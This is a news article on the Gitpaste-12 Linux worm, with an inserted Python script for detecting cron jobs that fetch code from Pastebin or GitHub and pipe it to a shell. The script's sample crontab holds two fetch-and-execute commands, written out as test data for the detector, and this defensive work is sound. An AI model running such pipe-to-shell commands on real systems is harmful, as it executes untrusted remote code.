Researchers at Juniper Threat Labs have discovered a new worm that targets Linux-based x86 servers, in addition to Linux ARM- and MIPS-based IoT devices. It is believed that the malware, dubbed Gitpaste-12, could be deployed against additional targets in the future, as its test code suggests it is still in development.
The threat uses GitHub and Pastebin to house component code and uses at least 12 attack modules to compromise target devices. Juniper has reported both the Pastebin URL and the GitHub repository that were initially used by the worm, resulting in both being shut down.
Gitpaste-12 operates by first using known exploits or brute-forcing passwords to gain entry into a system. It then uses the cron utility to schedule updates to the botnet. It systematically takes down system defences, including those connected to large-scale public cloud deployments.
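A defender's check for the cron-based update step described above, added here as an illustration (not code from Juniper or from the worm). It assumes the scheduled job downloads a script from Pastebin or GitHub and pipes it into a shell, a shape the article does not spell out; the crontab lines and URLs are constructed placeholders.

```python
import re

# Hosts the article names as staging locations, plus GitHub's raw-file host.
STAGING_HOSTS = ("pastebin.com", "github.com", "raw.githubusercontent.com")

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(/\S*)?")
FETCH_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:/\S+/)?(?:ba|da|z)?sh\b")
ENV_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def cron_command(line, system_crontab=False):
    """Return the command part of a crontab line, or None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_RE.match(line):
        return None
    # @reboot/@hourly style uses 1 schedule field, classic style uses 5.
    n_sched = 1 if line.startswith("@") else 5
    skip = n_sched + (1 if system_crontab else 0)  # /etc/crontab adds a user field
    parts = line.split(None, skip)
    return parts[skip] if len(parts) > skip else None

def suspicious_jobs(crontab_text, system_crontab=False):
    """Return (line_no, host, command) for jobs that fetch from a staging host and pipe to a shell."""
    hits = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        cmd = cron_command(line, system_crontab)
        if not cmd or not FETCH_RE.search(cmd) or not PIPE_TO_SHELL_RE.search(cmd):
            continue
        for m in URL_RE.finditer(cmd):
            host = m.group(1).lower()
            if any(host == h or host.endswith("." + h) for h in STAGING_HOSTS):
                hits.append((no, host, cmd))
                break
    return hits

# Constructed sample crontab (not taken from the worm); URLs are placeholders.
SAMPLE = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -s https://pastebin.com/raw/EXAMPLE | sh
@reboot wget -qO- https://raw.githubusercontent.com/example/example/main/x.sh | bash
30 2 * * 0 curl -s https://updates.example.org/check -o /tmp/check.json
"""

if __name__ == "__main__":
    for no, host, cmd in suspicious_jobs(SAMPLE):
        print(f"line {no}: fetch-and-execute from {host}: {cmd}")
```

Run it against the output of `crontab -l` for each user and, with `system_crontab=True`, against `/etc/crontab` and the files in `/etc/cron.d`.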
Opening a can of worms
Unlike other forms of malware, worms create copies of themselves that then spread to other devices. Sometimes worms are tasked with installing malicious software, or they simply self-replicate over and over again, depleting system resources. In either situation, worms can be particularly frustrating to remove.
“No malware is good to have, but worms are particularly annoying,” Juniper explained in a blog post. “Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in a poor reputation for your organization.”
According to ongoing analysis, Gitpaste-12 has a low detection rate across antivirus programs. Still, certain security packages will provide safeguards against the worm malware, including Juniper’s SRX Intrusion Detection and Prevention solution and Juniper ATP Cloud.